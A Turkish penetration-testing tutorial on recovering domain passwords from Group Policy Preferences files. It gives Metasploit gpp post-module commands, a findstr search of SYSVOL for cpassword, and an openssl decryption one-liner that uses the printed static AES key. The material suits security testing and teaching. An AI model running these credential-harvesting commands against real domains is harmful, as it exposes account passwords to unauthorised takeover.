Meterpreter Bağlantısı Elde Edilmiş Olan Windows Bilgisayarda MSF gpp Post Modülü ile Grup İlkelerindeki Erişim Bilgilerinin Elde Edilmesi

0
347
views
Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarda kritik bilgi elde edilmeye çalışılır. Etki alanlarında işletim sistemi üzerinde parolaların ayarlanması için Group Policy Preferences kullanılabilir. Bu yazıda, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden etki alanındaki grup ilkelerinin birisinde kayıtlı olan erişim bilgileri, MSF gpp post modülü ile elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

 

1) MSF gpp Post Modülü Kullanımı

Etki alanı denetleyicisinde bir grup ilkesi ile cevat.yakupgil adlı hesabın parolasının yapılandırıldığı görülmektedir.

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-01

Varsayılan durumda, etki alanındaki herhangi bir istemci bilgisayarda, etki alanı hesabı ile bu parolanın şifrelenmiş/karıştırılmış haline Groups.xml dosyasından erişim sağlanabilir. Parolanın bu halinin Groups.xml dosyasındaki “cpassword” değişkenine atanmış olduğu görülmektedir. Etki alanındaki bir istemci bu değişkendeki şifreli parola değerini, istemci üzerinde kayıtlı olan simetrik bir SHA256 anahtarı ile deşifre eder.

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-02

 

Not: Parolanın tespit edilebileceği diğer dosyalar aşağıdaki gibi sıralanabilir.

  • Groups.xml
  • Services.xml
  • Scheduledtasks.xml
  • DataSources.xml
  • Printers.xml
  • Drives.xml

W7 adlı etki alanındaki bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF gpp post modülü ile grup ilkesindeki “cpassword” değerine atanan parolanın açık halinin elde edilmesi için modül seçilir ve seçenekleri incelenir.

sessions
search gpp type:post
use post/windows/gather/credentials/gpp
show options

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-03

Modüle oturum ID değeri verilerek modül çalışıtırılır ve grup ilkesinde kayıtlı olan kimlik bilgileri ele geçirilir.

set SESSION 1
show options
run

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-04

Böylece, cevat.yakupgil hesabının parolasının açık metin hali elde edilmiş ve ilgili Groups.xml dosyasının içeriği kaydedilmiştir.

run

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-05

 

AES256 ile şifrelenen bu verinin çözülebilmesinin sebebi simetrik anahtarının Microsoft tarafından (yanlışlıkla) ifşa edilmiş (kendi sitesinde yayınlanmış) olmasıdır. Statik olan bu simetrik anahtar aşağıdaki gibidir:

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

 

Groups.xml dosyası /root/.msf/loot dizinine kaydedilmiş olduğu görülmektedir.

acquiring-sensitive-logon-informations-on-group-policy-by-using-msf-gpp-post-module-06

 

2) GPPPassword Betiği Kullanımı

Meterpreter elde edilmeden de “cpassword” değeri tespit edilebilir.

findstr /S /I cpassword \\EtkiAlaniFQDNAdi\SYSVOL\EtkiAlaniFQDNAdi\Policies\*.xml

 

“cpassword” değeri elde edildikten sonra, GPPPassword adlı bir powershell betiği ile de açık metin parola deşifre edilebilirdi.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1

 

 

3) Openssl Aracı Kullanımı

Standart Linux komutları ile de parola açık metin olarak deşifre edilebilir.

echo ‘Base64FOrmatindeParola’ | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000

 

 

 

 

Kaynak:

Group Policy Preferences

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.